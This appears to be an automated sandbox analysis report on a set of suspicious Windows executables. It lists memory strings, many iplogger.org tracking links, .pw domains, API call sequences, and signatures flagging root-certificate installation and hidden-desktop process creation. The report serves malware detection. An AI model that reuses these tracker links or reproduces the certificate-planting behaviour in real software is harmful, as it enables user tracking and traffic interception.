Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvrrg.img?h=166&w=310
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yHSm.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yqHP.img?h=75&w=100
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 85F91A36E275562F.exe.19.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: askinstall21.exeString found in binary or memory: http://www.fddnice.pw/
Source: askinstall21.exeString found in binary or memory: http://www.ipcode.pw/
Source: askinstall21.exeString found in binary or memory: http://www.ipcode.pw/0.0.0.0CNpathSOFTWARE
Source: jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: ubisoftpro.exeString found in binary or memory: http://www.winimage.com/zLibDll
Source: askinstall21.exeString found in binary or memory: http://www.zxfc.pw/Home/Index/sksxz?uid=3a1c3033bf5a5764882caec7a4cf3849e7de2ef2a8d79cece23467f1d887
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmpString found in binary or memory: https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_
Source: jg2_2qua.exe, 0000001A.00000003.498781258.00000000040A8000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmpString found in binary or memory: https://charlesproxy.com/ssl1
Source: jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: jg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: jg2_2qua.exe, 0000001A.00000003.493950837.0000000003F18000.00000004.00000001.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BE6B7572D
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/16ajh7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/16xjh7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/19iM77
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1Ka7t7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1KyTy7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1O2BH
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1OXFG
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1OZVH
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1OhAG
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1T79i7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1T89i7
Source: John_Ship.urlString found in binary or memory: https://iplogger.org/1TT4a7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1TW3i7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1UpU57
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1Uts87
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1X8M97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1XJq97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1XKq97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1XSq97
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1b4887
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1bV787
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1lC5g
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1q6Jt7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1uVkt7
Source: askinstall21.exeString found in binary or memory: https://iplogger.org/1yXwr7
Source: ubisoftpro.exeString found in binary or memory: https://iplogger.org/2WS9q6ubisoftplushttps://iplogger.org/2WF9q6ubisoftsmphttps://iplogger.org/2WJ9
Source: ubisoftpro.exeString found in binary or memory: https://iplogger.org/2WX9q6ubisoftmorehttps://iplogger.org/2WN9q6ubisoftablehttps://iplogger.org/2W6
Source: jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.480069462.0000000000724000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/ZdnY7
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: jg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, SibClr.dll.15.drString found in binary or memory: https://sectigo.com/CPS0
Source: hjjgaa.exeString found in binary or memory: https://sectigo.com/CPS0B
Source: Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drString found in binary or memory: https://sectigo.com/CPS0D
Source: ubisoftpro.exeString found in binary or memory: https://www.airbnb.cn/account-settings
Source: ubisoftpro.exeString found in binary or memory: https://www.airbnb.cn/account-settingstext/html
Source: jg2_2qua.exe, 0000001A.00000003.489035024.0000000003DA7000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.496197862.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
Source: jg2_2qua.exe, 0000001A.00000003.493950837.0000000003F18000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: jg2_2qua.exe, 0000001A.00000003.497641721.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.h
Source: jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.496197862.0000000004020000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: jg2_2qua.exe, 0000001A.00000003.493311716.0000000003D67000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004050F9
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0046C604 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_0046C604
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,15_2_004044D1
Source: Setup.exe, 0000000F.00000002.468343589.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0126BF99 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_0126BF99
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_0047C08E

E-Banking Fraud:

barindex
Registers a new ROOT certificateShow sources
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,19_2_1001F720
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEA4C20 _DebugHeapAllocator,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,std::ios_base::good,ExpandEnvironmentStringsW,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,Concurrency::details::ContextBase::GetWorkQueueIdentity,GetCurrentThreadId,GetThreadDesktop,CreateDesktopW,GetLastError,SetThreadDesktop,GetLastError,CloseDesktop,CreateProcessW,GetLastError,CloseDesktop,CloseHandle,CreateJobObjectW,AssignProcessToJobObject,_DebugHeapAllocator,Sleep,Sleep,_DebugHeapAllocator,SetThreadDesktop,CloseDesktop,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,15_2_6FEA4C20

System Summary:

barindex
PE file has a writeable .text sectionShow sources
Source: aliens.exe.17.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 85F91A36E275562F.exe.19.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00057165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,17_2_00057165
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_004461ED
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,15_2_004038AF
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,19_2_004364AA
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC80F70_2_00EC80F7
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ECA6AE0_2_00ECA6AE
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EE209E0_2_00EE209E
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC58940_2_00EC5894
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED51D40_2_00ED51D4
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED99510_2_00ED9951
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED5AE80_2_00ED5AE8
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ECB2CF0_2_00ECB2CF
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC4AD70_2_00EC4AD7
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EE62240_2_00EE6224
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EE1BF00_2_00EE1BF0
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED63520_2_00ED6352
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC548E0_2_00EC548E
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC15F30_2_00EC15F3
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED56D00_2_00ED56D0
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED97220_2_00ED9722
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC4F0B0_2_00EC4F0B
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ED5F1D0_2_00ED5F1D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0128615A1_2_0128615A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012940EE1_2_012940EE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012913221_2_01291322
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0128428A1_2_0128428A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0126C58B1_2_0126C58B
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_0127C7391_2_0127C739
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012946601_2_01294660
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_012846A21_2_012846A2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01293B7C1_2_01293B7C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01284AD71_2_01284AD7
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01283D961_2_01283D96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01284F0C1_2_01284F0C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01294E081_2_01294E08
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01295E961_2_01295E96
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10008B241_2_10008B24
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_100992171_2_10099217
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1007E3301_2_1007E330
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10097B401_2_10097B40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10084E001_2_10084E00
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1007FE901_2_1007FE90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1000BEB61_2_1000BEB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_1008FF8D1_2_1008FF8D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_10012FD31_2_10012FD3
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004079A215_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004049A815_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_00406EFE15_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_0040737E15_2_0040737E
